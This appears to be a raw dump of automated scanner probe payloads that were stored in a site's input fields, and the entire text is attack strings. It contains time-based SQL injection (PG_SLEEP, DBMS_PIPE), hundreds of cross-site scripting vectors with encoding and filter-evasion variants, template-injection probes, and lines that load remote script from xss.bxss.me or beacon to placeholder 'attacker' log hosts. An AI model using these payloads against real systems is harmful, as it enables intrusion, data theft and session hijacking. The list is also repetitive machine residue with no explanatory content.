555-1 OR 210=(SELECT 210 FROM PG_SLEEP(15))--

555

555<ScRiPt >N5bQ(9220)</ScRiPt>

555<img src=//xss.bxss.me/t/dot.gif onload=oBY9(9891)>

5559339468

555<svg  \xa0onload=ufLz(9023)

'"()&%<zzz><ScRiPt >DaC0(9119)</ScRiPt>

dfb{@math key=98991 method="multiply" operand=97996/}xca

<th:t="${dfb}#foreach

555<iframe src='data:text/html

555pBz9y <ScRiPt >NVnD(9858)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%47%64%49%74%289551%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=oBY9(9181)>

bfg5045\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5045

555<ScRiPt >s2NI(9915)</ScRiPt>

<th:t="${dfb}#foreach

555<svg  \xa0onload=N5bQ(9273)

5559850094

dfb{{{this}}}xca

555<isindex type=image src=1 onerror=ufLz(9827)>

555

555<WHBWSM>GVVOY[!+!]</WHBWSM>

555<body onload=RyJ5(9345)>

555<img/src=">" onerror=alert(9689)>

bfgx9817\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9817

555<svg  \xa0onload=s2NI(9342)

555-1) OR 203=(SELECT 203 FROM PG_SLEEP(15))--

555'"()&%<zzz><ScRiPt >5BZJ(9357)</ScRiPt>

555'"()&%<zzz><ScRiPt >MTSG(9501)</ScRiPt>

555<isindex type=image src=1 onerror=N5bQ(9934)>

555

555\u003CScRiPt\GdIt(9705)\u003C/sCripT\u003E

555<iframe src='data:text/html

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<img src=//xss.bxss.me/t/dot.gif onload=RyJ5(9630)>

555<ifRAme sRc=9973.com></IfRamE>

<%={{={@{#{${dfb}}%>

bfg7775\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7775

#{98991*97996*98991*97996}

%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%42%59%39%289066%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=s2NI(9200)>

'"()&%<zzz><ScRiPt >MTSG(9227)</ScRiPt>

555<a4rU0UF x=9406>

555<img src=xyz OnErRor=RyJ5(9544)>

'"()&%<zzz><ScRiPt >5BZJ(9612)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555&lt

555

555<iframe src='data:text/html

555<body onload=ufLz(9023)>

555<iframe src='data:text/html

dfb#{xca}=123

555-1)) OR 309=(SELECT 309 FROM PG_SLEEP(15))--

555\u003CScRiPt\oBY9(9884)\u003C/sCripT\u003E

5559096681

bfgx7106\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7106

555

\xf6<img zzz onmouseover=GdIt(91741) //\xf6>

555<img src=//xss.bxss.me/t/dot.gif onload=ufLz(9019)>

dfb{{98991*97996}}xca

555

555<img/src=">" onerror=alert(9290)>

555<img sRc='http://attacker-9559/log.php?

5559214357

555<body onload=N5bQ(9395)>

555<body onload=s2NI(9166)>

dfb{{98991*97996}}xca

555<img src=xyz OnErRor=ufLz(9977)>

555Fai6Ercz' OR 186=(SELECT 186 FROM PG_SLEEP(15))--

dfb{{'abcd'.toUpperCase()}}xca

bfg7982\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7982

555&lt

<th:t="${dfb}#foreach

555<input autofocus onfocus=GdIt(9318)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%52%79%4A%35%289404%29%3C%2F%73%43%72%69%70%54%3E

<%={{={@{#{${dfb}}%>

dfb[[${98991*97996}]]xca

555<img src=//xss.bxss.me/t/dot.gif onload=s2NI(9200)>

555<img src=//xss.bxss.me/t/dot.gif onload=N5bQ(9231)>

bfg3917\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl3917

555<aFevs3K<

555<img/src=">" onerror=alert(9130)>

\xf6<img zzz onmouseover=oBY9(97361) //\xf6>

555

<a HrEF=http://xss.bxss.me></a>

bfgx3675\xc0\xbez1\xc0\xbcz2a\x90bcxhjl3675

555\u003CScRiPt\RyJ5(9456)\u003C/sCripT\u003E

555

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA

<a HrEF=jaVaScRiPT:>

555<input autofocus onfocus=oBY9(9422)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%75%66%4C%7A%289544%29%3C%2F%73%43%72%69%70%54%3E

bfgx6636\xc0\xbez1\xc0\xbcz2a\x90bcxhjl6636

555<img src=xyz OnErRor=N5bQ(9189)>

555<img src=xyz OnErRor=s2NI(9963)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb__${98991*97996}__::.x

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

555&lt

555dn76LisB') OR 490=(SELECT 490 FROM PG_SLEEP(15))--

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

<%={{={@{#{${dfb}}%>

555<img/src=">" onerror=alert(9338)>

555\u003CScRiPt\ufLz(9386)\u003C/sCripT\u003E

555

<a HrEF=http://xss.bxss.me></a>

555}body{zzz:Expre/**/SSion(GdIt(9896))}

dfb{{98991*97996}}xca

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

%35%35%35%3C%53%63%52%69%50%74%20%3E%4E%35%62%51%289072%29%3C%2F%73%43%72%69%70%54%3E

5551Q9J8AlX')) OR 915=(SELECT 915 FROM PG_SLEEP(15))--

555<ScRiPt >30s3(9670)</ScRiPt>

555

\xf6<img zzz onmouseover=RyJ5(97861) //\xf6>

555<img/src=">" onerror=alert(9601)>

555EHXJD <ScRiPt >GdIt(9542)</ScRiPt>

<a HrEF=jaVaScRiPT:>

555

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

555&lt

<th:t="${dfb}#foreach

555<input autofocus onfocus=RyJ5(9045)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%73%32%4E%49%289801%29%3C%2F%73%43%72%69%70%54%3E

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<WKD4OS>BPMN2[!+!]</WKD4OS>

555\u003CScRiPt\N5bQ(9791)\u003C/sCripT\u003E

555<ScRiPt >mjoN(9460)</ScRiPt>

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

dfb[[${98991*97996}]]xca

<th:t="${dfb}#foreach

555

555}body{zzz:Expre/**/SSion(oBY9(9921))}

\xf6<img zzz onmouseover=ufLz(99461) //\xf6>

dfb__${98991*97996}__::.x

555<WGMKXY>P1FY3[!+!]</WGMKXY>

555\u003CScRiPt\s2NI(9326)\u003C/sCripT\u003E

<a HrEF=http://xss.bxss.me></a>

555&lt

555<script>30s3(9117)</script>

555<input autofocus onfocus=ufLz(9271)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9828.com></IfRamE>

dfb__${98991*97996}__::.x

555<WKAXD4>M2KDY[!+!]</WKAXD4>

555

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

\xf6<img zzz onmouseover=N5bQ(91961) //\xf6>

555<script>30s3(9859)</script>9859

555&lt

555'"

<a HrEF=jaVaScRiPT:>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555RdEwb <ScRiPt >oBY9(9134)</ScRiPt>

555<script>mjoN(9162)</script>

555<ScRiPt >hAH8(9958)</ScRiPt>

\xf6<img zzz onmouseover=s2NI(91361) //\xf6>

555<input autofocus onfocus=N5bQ(9967)>

<a HrEF=http://xss.bxss.me></a>

555<aEb2L3u x=9476>

dfb{{98991*97996}}xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555\xc0\xa7\xc0\xa2%2527%2522\'\"

555

555<WFN0QV>1FKYJ[!+!]</WFN0QV>

555<script>mjoN(9522)</script>9522

555<ScR<ScRiPt>IpT>30s3(9602)</sCr<ScRiPt>IpT>

555}body{zzz:Expre/**/SSion(RyJ5(9374))}

555<WUXI9E>VGWB8[!+!]</WUXI9E>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

@@28CRD

555<input autofocus onfocus=s2NI(9417)>

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555<img sRc='http://attacker-9315/log.php?

555<ScRiPt >9PjQ(9605)</ScRiPt>

dfb[[${98991*97996}]]xca

555<script>hAH8(9347)</script>

555<ScR<ScRiPt>IpT>mjoN(9409)</sCr<ScRiPt>IpT>

<a HrEF=http://xss.bxss.me></a>

555

555<ScRiPt >30s3(9294)</ScRiPt>

555rNQ7u <ScRiPt >RyJ5(9453)</ScRiPt>

555<ifRAme sRc=9883.com></IfRamE>

555}body{zzz:Expre/**/SSion(ufLz(9371))}

555<aEi8kCl<

<a HrEF=jaVaScRiPT:>

dfb{{98991*97996}}xca

555<WEXDKT>8DQ0A[!+!]</WEXDKT>

dfb__${98991*97996}__::.x

555<ScRiPt >mjoN(9139)</ScRiPt>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

555<script>hAH8(9957)</script>9957

555

555e0bBx <ScRiPt >ufLz(9257)</ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9699></ScRiPt>

555<W2OWSX>NCQYN[!+!]</W2OWSX>

555<aAUdWpF x=9694>

555}body{zzz:Expre/**/SSion(N5bQ(9187))}

555<ScR<ScRiPt>IpT>hAH8(9472)</sCr<ScRiPt>IpT>

<a HrEF=jaVaScRiPT:>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9968></ScRiPt>

dfb__${98991*97996}__::.x

555<WPDND9>W5KW4[!+!]</WPDND9>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<script>9PjQ(9051)</script>

dfb[[${98991*97996}]]xca

555'"()&%<zzz><ScRiPt >eirr(9185)</ScRiPt>

555'"()&%<zzz><ScRiPt >fhSZ(9822)</ScRiPt>

555<ifRAme sRc=9939.com></IfRamE>

555<img sRc='http://attacker-9605/log.php?

555NK6Bf <ScRiPt >N5bQ(9094)</ScRiPt>

555<ScRiPt >30s3(9665)</ScRiPt>

555

555<script>9PjQ(9186)</script>9186

555<ScRiPt >DaC0(9482)</ScRiPt>

555<ScRiPt >hAH8(9126)</ScRiPt>

555}body{zzz:Expre/**/SSion(s2NI(9281))}

555<ScRiPt >mjoN(9776)</ScRiPt>

dfb__${98991*97996}__::.x

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<ifRAme sRc=9549.com></IfRamE>

555<svg  \xa0onload=30s3(9010)

'"()&%<zzz><ScRiPt >eirr(9948)</ScRiPt>

555<amIdzH2<

555<adDANCW x=9693>

'"()&%<zzz><ScRiPt >fhSZ(9815)</ScRiPt>

555<WWCEG0>KZFD5[!+!]</WWCEG0>

555<ScR<ScRiPt>IpT>9PjQ(9740)</sCr<ScRiPt>IpT>

555

555ZnVt5 <ScRiPt >s2NI(9531)</ScRiPt>

555<aAdvUMT x=9016>

555<ScRiPt >MTSG(9647)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<isindex type=image src=1 onerror=30s3(9432)>

555<WLY10D>IXEMI[!+!]</WLY10D>

555<svg  \xa0onload=mjoN(9082)

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9896></ScRiPt>

555<ifRAme sRc=9802.com></IfRamE>

555<WSSIJW>P2LK3[!+!]</WSSIJW>

555<img sRc='http://attacker-9528/log.php?

5559089434

5559554218

555<ScRiPt >9PjQ(9656)</ScRiPt>

555<W0E8WE>HKPFR[!+!]</W0E8WE>

555<ScRiPt >5BZJ(9877)</ScRiPt>

555<iframe src='data:text/html

555<img sRc='http://attacker-9195/log.php?

555<isindex type=image src=1 onerror=mjoN(9930)>

555<ifRAme sRc=9800.com></IfRamE>

555<ScRiPt >hAH8(9384)</ScRiPt>

555<script>DaC0(9312)</script>

555<aBdIpia x=9510>

bfg4137\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl4137

555<iframe src='data:text/html

555<script>MTSG(9500)</script>

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9521></ScRiPt>

555<a6KBzId<

555<W3JPLP>GV4CS[!+!]</W3JPLP>

555<aQ34vEY<

bfg7141\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl7141

555

555<svg  \xa0onload=hAH8(9396)

555<body onload=30s3(9619)>

bfgx1976\xc0\xbez1\xc0\xbcz2a\x90bcxhjl1976

555<aS2LFrl x=9279>

555<img sRc='http://attacker-9509/log.php?

555<body onload=mjoN(9947)>

555

555<script>5BZJ(9047)</script>

555<script>MTSG(9597)</script>9597

555<ScRiPt >9PjQ(9489)</ScRiPt>

555<script>DaC0(9396)</script>9396

555

555<isindex type=image src=1 onerror=hAH8(9755)>

555

555<arZR0t0<

bfgx2830\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2830

<%={{={@{#{${dfb}}%>

555<img sRc='http://attacker-9126/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=30s3(9669)>

555<img src=//xss.bxss.me/t/dot.gif onload=mjoN(9749)>

555<script>5BZJ(9425)</script>9425

555<svg  \xa0onload=9PjQ(9053)

555<ScR<ScRiPt>IpT>DaC0(9177)</sCr<ScRiPt>IpT>

555

555

555<ScR<ScRiPt>IpT>5BZJ(9953)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>MTSG(9088)</sCr<ScRiPt>IpT>

<%={{={@{#{${dfb}}%>

555<iframe src='data:text/html

555<img src=xyz OnErRor=mjoN(9970)>

555<img src=xyz OnErRor=30s3(9353)>

555<a0h0IlR<

555<isindex type=image src=1 onerror=9PjQ(9685)>

555<ScRiPt >DaC0(9321)</ScRiPt>

555<ScRiPt >5BZJ(9280)</ScRiPt>

<th:t="${dfb}#foreach

555

555<img/src=">" onerror=alert(9841)>

555<ScRiPt >MTSG(9567)</ScRiPt>

555<body onload=hAH8(9761)>

555

555<img/src=">" onerror=alert(9872)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9973></ScRiPt>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9193></ScRiPt>

555<iframe src='data:text/html

<th:t="${dfb}#foreach

555

555<img src=//xss.bxss.me/t/dot.gif onload=hAH8(9414)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%33%30%73%33%289218%29%3C%2F%73%43%72%69%70%54%3E

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9481></ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%6D%6A%6F%4E%289466%29%3C%2F%73%43%72%69%70%54%3E

555<body onload=9PjQ(9621)>

555<ScRiPt >DaC0(9857)</ScRiPt>

555<ScRiPt >5BZJ(9996)</ScRiPt>

555

555<img src=xyz OnErRor=hAH8(9690)>

555<img src=//xss.bxss.me/t/dot.gif onload=9PjQ(9077)>

555<svg  \xa0onload=5BZJ(9721)

555<svg  \xa0onload=DaC0(9764)

555

555\u003CScRiPt\mjoN(9015)\u003C/sCripT\u003E

555<ScRiPt >MTSG(9909)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555\u003CScRiPt\30s3(9472)\u003C/sCripT\u003E

555<img/src=">" onerror=alert(9762)>

555<img src=xyz OnErRor=9PjQ(9457)>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<isindex type=image src=1 onerror=5BZJ(9535)>

555<isindex type=image src=1 onerror=DaC0(9849)>

555&lt

555&lt

555<svg  \xa0onload=MTSG(9603)

555'"()&%<zzz><ScRiPt >yNox(9859)</ScRiPt>

555

555<img/src=">" onerror=alert(9650)>

555'"()&%<zzz><ScRiPt >Uvh4(9446)</ScRiPt>

555

555<iframe src='data:text/html

\xf6<img zzz onmouseover=mjoN(97181) //\xf6>

\xf6<img zzz onmouseover=30s3(91371) //\xf6>

%35%35%35%3C%53%63%52%69%50%74%20%3E%68%41%48%38%289659%29%3C%2F%73%43%72%69%70%54%3E

555

555<isindex type=image src=1 onerror=MTSG(9102)>

'"()&%<zzz><ScRiPt >yNox(9600)</ScRiPt>

dfb{{98991*97996}}xca

555<iframe src='data:text/html

555\u003CScRiPt\hAH8(9808)\u003C/sCripT\u003E

555<input autofocus onfocus=30s3(9952)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%39%50%6A%51%289024%29%3C%2F%73%43%72%69%70%54%3E

'"()&%<zzz><ScRiPt >Uvh4(9120)</ScRiPt>

dfb{{98991*97996}}xca

555<input autofocus onfocus=mjoN(9828)>

555<body onload=DaC0(9462)>

5559883019

dfb[[${98991*97996}]]xca

555<body onload=5BZJ(9515)>

555<iframe src='data:text/html

555<img src=//xss.bxss.me/t/dot.gif onload=DaC0(9058)>

555'"()&%<zzz><ScRiPt >WAav(9447)</ScRiPt>

555&lt

<a HrEF=http://xss.bxss.me></a>

5559911450

dfb[[${98991*97996}]]xca

555\u003CScRiPt\9PjQ(9210)\u003C/sCripT\u003E

555<body onload=MTSG(9668)>

555

555<img src=//xss.bxss.me/t/dot.gif onload=5BZJ(9976)>

dfb__${98991*97996}__::.x

<a HrEF=http://xss.bxss.me></a>

bfg1424\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl1424

<a HrEF=jaVaScRiPT:>

dfb__${98991*97996}__::.x

555<img src=xyz OnErRor=DaC0(9145)>

bfg5959\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl5959

'"()&%<zzz><ScRiPt >WAav(9292)</ScRiPt>

\xf6<img zzz onmouseover=hAH8(98001) //\xf6>

555<img src=//xss.bxss.me/t/dot.gif onload=MTSG(9703)>

<a HrEF=jaVaScRiPT:>

555'"()&%<zzz><ScRiPt >YIXZ(9319)</ScRiPt>

555<img src=xyz OnErRor=5BZJ(9705)>

555&lt

5559377395

555<input autofocus onfocus=hAH8(9591)>

555<img/src=">" onerror=alert(9161)>

bfgx8963\xc0\xbez1\xc0\xbcz2a\x90bcxhjl8963

555<img src=xyz OnErRor=MTSG(9733)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

bfgx9231\xc0\xbez1\xc0\xbcz2a\x90bcxhjl9231

555}body{zzz:Expre/**/SSion(30s3(9717))}

'"()&%<zzz><ScRiPt >YIXZ(9522)</ScRiPt>

555<img/src=">" onerror=alert(9043)>

<%={{={@{#{${dfb}}%>

555

<%={{={@{#{${dfb}}%>

555KziQF <ScRiPt >30s3(9507)</ScRiPt>

bfg2696\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2696

5559980155

555<ScRiPt >fhSZ(9040)</ScRiPt>

<a HrEF=http://xss.bxss.me></a>

555<img/src=">" onerror=alert(9686)>

555<ScRiPt >eirr(9543)</ScRiPt>

\xf6<img zzz onmouseover=9PjQ(99461) //\xf6>

555}body{zzz:Expre/**/SSion(mjoN(9345))}

%35%35%35%3C%53%63%52%69%50%74%20%3E%44%61%43%30%289570%29%3C%2F%73%43%72%69%70%54%3E

555

555

bfgx7925\xc0\xbez1\xc0\xbcz2a\x90bcxhjl7925

555YqkkX <ScRiPt >mjoN(9243)</ScRiPt>

<a HrEF=jaVaScRiPT:>

%35%35%35%3C%53%63%52%69%50%74%20%3E%35%42%5A%4A%289886%29%3C%2F%73%43%72%69%70%54%3E

%35%35%35%3C%53%63%52%69%50%74%20%3E%4D%54%53%47%289144%29%3C%2F%73%43%72%69%70%54%3E

bfg2286\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9hjl2286

<th:t="${dfb}#foreach

555<WO5MBY>8BINE[!+!]</WO5MBY>

555<WGU2VY>4PKBL[!+!]</WGU2VY>

555\u003CScRiPt\DaC0(9538)\u003C/sCripT\u003E

555<input autofocus onfocus=9PjQ(9939)>

555<WEW9XE>WB6DS[!+!]</WEW9XE>

<%={{={@{#{${dfb}}%>

555\u003CScRiPt\MTSG(9688)\u003C/sCripT\u003E

<th:t="${dfb}#foreach

555<WOKEAG>LHRBQ[!+!]</WOKEAG>

555\u003CScRiPt\5BZJ(9227)\u003C/sCripT\u003E

555}body{zzz:Expre/**/SSion(hAH8(9546))}

555

<a HrEF=http://xss.bxss.me></a>

555<ifRAme sRc=9215.com></IfRamE>

555<script>fhSZ(9581)</script>

bfgx2193\xc0\xbez1\xc0\xbcz2a\x90bcxhjl2193

555&lt

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555

555<script>eirr(9500)</script>

555&lt

555&lt

555

555kQcgy <ScRiPt >hAH8(9504)</ScRiPt>

555<ifRAme sRc=9224.com></IfRamE>

555

555<script>fhSZ(9427)</script>9427

555<aQaPprP x=9131>

<a HrEF=jaVaScRiPT:>

\xf6<img zzz onmouseover=5BZJ(91261) //\xf6>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555<acvcN9x x=9582>

555<WOKSEC>IDCXJ[!+!]</WOKSEC>

555<script>eirr(9135)</script>9135

\xf6<img zzz onmouseover=DaC0(99601) //\xf6>

\xf6<img zzz onmouseover=MTSG(99431) //\xf6>

555

<%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

555<img sRc='http://attacker-9280/log.php?

555}body{zzz:Expre/**/SSion(9PjQ(9461))}

555<input autofocus onfocus=5BZJ(9482)>

555<img sRc='http://attacker-9407/log.php?

555

555<ScR<ScRiPt>IpT>fhSZ(9593)</sCr<ScRiPt>IpT>

555

555<ScR<ScRiPt>IpT>eirr(9169)</sCr<ScRiPt>IpT>

dfb{{98991*97996}}xca

555

<th:t="${dfb}#foreach

555<ifRAme sRc=9441.com></IfRamE>

555<aT2NbDY<

555<input autofocus onfocus=DaC0(9095)>

dfb[[${98991*97996}]]xca

<a HrEF=http://xss.bxss.me></a>

5550GPBm <ScRiPt >9PjQ(9985)</ScRiPt>

555<input autofocus onfocus=MTSG(9081)>

555<atZZn8Z<

555<ScRiPt >eirr(9179)</ScRiPt>

555<ScRiPt >fhSZ(9899)</ScRiPt>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

555<aNALbq0 x=9679>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<a HrEF=http://xss.bxss.me></a>

<a HrEF=jaVaScRiPT:>

555<WZBAUE>RSNV0[!+!]</WZBAUE>

<a HrEF=http://xss.bxss.me></a>

dfb__${98991*97996}__::.x

555

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9466></ScRiPt>

dfb[[${98991*97996}]]xca

555<img sRc='http://attacker-9168/log.php?

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9045></ScRiPt>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

<a HrEF=jaVaScRiPT:>

555}body{zzz:Expre/**/SSion(5BZJ(9982))}

<a HrEF=jaVaScRiPT:>

555<ScRiPt >eirr(9696)</ScRiPt>

555<ifRAme sRc=9334.com></IfRamE>

555<ScRiPt >fhSZ(9889)</ScRiPt>

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

555<ScRiPt >Uvh4(9266)</ScRiPt>

555}body{zzz:Expre/**/SSion(DaC0(9077))}

555<svg  \xa0onload=eirr(9585)

dfb[[${98991*97996}]]xca

555<ax3lo4t<

dfb[[${98991*97996}]]xca

555}body{zzz:Expre/**/SSion(MTSG(9806))}

555<akZzgjP x=9880>

555<svg  \xa0onload=fhSZ(9194)

555

555<WUZL1J>F3U4W[!+!]</WUZL1J>

555XZBP0 <ScRiPt >5BZJ(9657)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<isindex type=image src=1 onerror=eirr(9109)>

dfb__${98991*97996}__::.x

555<WM4EGZ>NB6M3[!+!]</WM4EGZ>

555JV6qY <ScRiPt >MTSG(9852)</ScRiPt>

555<script>Uvh4(9622)</script>

555<img sRc='http://attacker-9745/log.php?

dfb__${98991*97996}__::.x

555QBtK0 <ScRiPt >DaC0(9893)</ScRiPt>

555<isindex type=image src=1 onerror=fhSZ(9786)>

555<iframe src='data:text/html

555<ScRiPt >yNox(9371)</ScRiPt>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<WXTMM0>ECH2V[!+!]</WXTMM0>

555<ifRAme sRc=9932.com></IfRamE>

555

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555<W31B7W>1ARPN[!+!]</W31B7W>

555<script>Uvh4(9595)</script>9595

555<a44pyLE<

555<ScRiPt >YIXZ(9442)</ScRiPt>

555<WUUKDY>HUDSW[!+!]</WUUKDY>

555<iframe src='data:text/html

555

555<ifRAme sRc=9737.com></IfRamE>

555

555<WU9INW>WHCST[!+!]</WU9INW>

555<script>yNox(9157)</script>

555<body onload=eirr(9784)>

555<ifRAme sRc=9178.com></IfRamE>

555<ScRiPt >WAav(9512)</ScRiPt>

555<awIBu2B x=9042>

555<ScR<ScRiPt>IpT>Uvh4(9541)</sCr<ScRiPt>IpT>

555<script>yNox(9342)</script>9342

555<img src=//xss.bxss.me/t/dot.gif onload=eirr(9909)>

555<script>YIXZ(9239)</script>

555<img sRc='http://attacker-9996/log.php?

555<WIZTHV>ATWQE[!+!]</WIZTHV>

555<adcriQ0 x=9129>

555<anuzmKB x=9533>

555<body onload=fhSZ(9134)>

555<ScRiPt >Uvh4(9476)</ScRiPt>

555<img src=xyz OnErRor=eirr(9412)>

555<ScR<ScRiPt>IpT>yNox(9942)</sCr<ScRiPt>IpT>

555<img sRc='http://attacker-9696/log.php?

555<img sRc='http://attacker-9260/log.php?

555<img src=//xss.bxss.me/t/dot.gif onload=fhSZ(9508)>

555<img/src=">" onerror=alert(9974)>

555<aMBAUqe<

555<script>WAav(9820)</script>

555<ScRiPt >yNox(9460)</ScRiPt>

555<script>YIXZ(9393)</script>9393

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9346></ScRiPt>

555<script>WAav(9607)</script>9607

555<aESruhG<

555<ScRiPt >Uvh4(9496)</ScRiPt>

555<img src=xyz OnErRor=fhSZ(9502)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%65%69%72%72%289620%29%3C%2F%73%43%72%69%70%54%3E

555<aEFEqUx<

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9673></ScRiPt>

555<ScR<ScRiPt>IpT>YIXZ(9876)</sCr<ScRiPt>IpT>

555<ScR<ScRiPt>IpT>WAav(9490)</sCr<ScRiPt>IpT>

555<ScRiPt >yNox(9494)</ScRiPt>

555\u003CScRiPt\eirr(9861)\u003C/sCripT\u003E

555<svg  \xa0onload=Uvh4(9103)

555<ScRiPt >YIXZ(9724)</ScRiPt>

555<ScRiPt >WAav(9913)</ScRiPt>

555<img/src=">" onerror=alert(9104)>

555<svg  \xa0onload=yNox(9823)

555&lt

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9988></ScRiPt>

555<isindex type=image src=1 onerror=yNox(9663)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%66%68%53%5A%289213%29%3C%2F%73%43%72%69%70%54%3E

555<isindex type=image src=1 onerror=Uvh4(9731)>

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9906></ScRiPt>

\xf6<img zzz onmouseover=eirr(97921) //\xf6>

555<ScRiPt >YIXZ(9203)</ScRiPt>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<svg  \xa0onload=YIXZ(9459)

555<ScRiPt >WAav(9716)</ScRiPt>

555<input autofocus onfocus=eirr(9829)>

555\u003CScRiPt\fhSZ(9671)\u003C/sCripT\u003E

555<body onload=yNox(9254)>

555<body onload=Uvh4(9258)>

555&lt

555<svg  \xa0onload=WAav(9005)

555<isindex type=image src=1 onerror=YIXZ(9697)>

<a HrEF=http://xss.bxss.me></a>

555<img src=//xss.bxss.me/t/dot.gif onload=yNox(9640)>

555<img src=//xss.bxss.me/t/dot.gif onload=Uvh4(9321)>

555<isindex type=image src=1 onerror=WAav(9790)>

\xf6<img zzz onmouseover=fhSZ(98861) //\xf6>

555<iframe src='data:text/html

555<iframe src='data:text/html

555<img src=xyz OnErRor=Uvh4(9896)>

<a HrEF=jaVaScRiPT:>

555<body onload=YIXZ(9732)>

555<img src=xyz OnErRor=yNox(9220)>

555<input autofocus onfocus=fhSZ(9883)>

555}body{zzz:Expre/**/SSion(eirr(9193))}

555<body onload=WAav(9737)>

555<img/src=">" onerror=alert(9322)>

555<img src=//xss.bxss.me/t/dot.gif onload=YIXZ(9592)>

555<img/src=">" onerror=alert(9642)>

555<img src=//xss.bxss.me/t/dot.gif onload=WAav(9286)>

<a HrEF=http://xss.bxss.me></a>

55545KIn <ScRiPt >eirr(9365)</ScRiPt>

%35%35%35%3C%53%63%52%69%50%74%20%3E%79%4E%6F%78%289131%29%3C%2F%73%43%72%69%70%54%3E

555<img src=xyz OnErRor=YIXZ(9401)>

%35%35%35%3C%53%63%52%69%50%74%20%3E%55%76%68%34%289572%29%3C%2F%73%43%72%69%70%54%3E

<a HrEF=jaVaScRiPT:>

555<WFQTSF>MEMGA[!+!]</WFQTSF>

555<img src=xyz OnErRor=WAav(9591)>

555\u003CScRiPt\yNox(9879)\u003C/sCripT\u003E

555<img/src=">" onerror=alert(9898)>

555'"()&%<zzz><ScRiPt >50b0(9092)</ScRiPt>

555\u003CScRiPt\Uvh4(9188)\u003C/sCripT\u003E

555<ifRAme sRc=9034.com></IfRamE>

